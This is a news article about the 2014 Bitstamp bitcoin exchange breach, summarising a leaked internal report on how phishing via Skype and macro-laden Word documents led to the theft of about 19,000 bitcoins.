Bitcoin Exchange Breach Results in $5.3 Million Theft

Newly leaked, confidential documents have revealed details into a cyberattack aimed at Bitstamp, a company that fundamentally deals as a cryptocurrency trader, according to a report in SC Magazine.

the Bitcoin trading company suffered a breach on 29 December 2014. At the time, the company admitted to the theft within days of the breach. A total of 18,866 Bitcoins, worth nearly $5.3 million was lost in the attack. According to ZDNet’s estimates from May, Bitstamp held a total of 183,497 Bitcoins in its reserves, amounting to nearly $53 million. Simply put, the Bitcoin trader lost 10 percent of its assets during the raid.

Insight into the Breach

The report, authored by Bitstamp’s general counsel, George Frost, revealed that:

  • The loss of assets was first discovered by Damian Merlak, the chief technology officer on 4 January. A suspicious data transfer caught his eye, with 3.5 GB of data transferred to an unfamiliar IP address.
  • The file size immediately raised red flags because it was the precise size of the wallet.dat file which contains Bitstamp’s reserves in Bitcoins in a wallet.
  • This was deemed a sophisticated, targeted attack, since the attacker needed three IP addresses to connect to the company’s data server.
  • A remote hack was then executed after accessing the laptop owned by Luka Kodric, a Bitstamp employee who was connected to the company’s server via a VPN at the time.
  • With access to the wallet now secure, the attacker then accessed a different server to obtain the passphrases required to access the Bitcoins.

The report also revealed that a separate breach attempt was made using Kodric’s account again. His VPN connection, however, had the added security of two-factor authentication enabled. Kodric then received nine notifications on his phone within 20 minutes to provide the passkey as additional authentication. These login attempts were traced back to a Romanian IP address.

The weakest link in a hack – the human element

Kodric was one of six employees targeted between 4 November and 12 December for a phishing campaign. Persistent contacts were made via Skype and once Kodric’s trust had been gained, a series of simple Word documents were sent that contained malicious VBA scripts developed and designed to connect to an external IP address which belonged to the attacker.

Additional malicious files were then sent via Skype to Kodric and eventually the wallet.dat file that existed in his laptop was connected to the network, followed by the successful hack on December 29 when attackers used the passphrases to log in to the data file server.

Kevin Epstein, a cybersecurity expert, noted the human element in the breach and said, “This is yet further confirmation that the human factor remains the weakest link in many security profiles – and that use of attachments and macros continues to exploit that weakness.”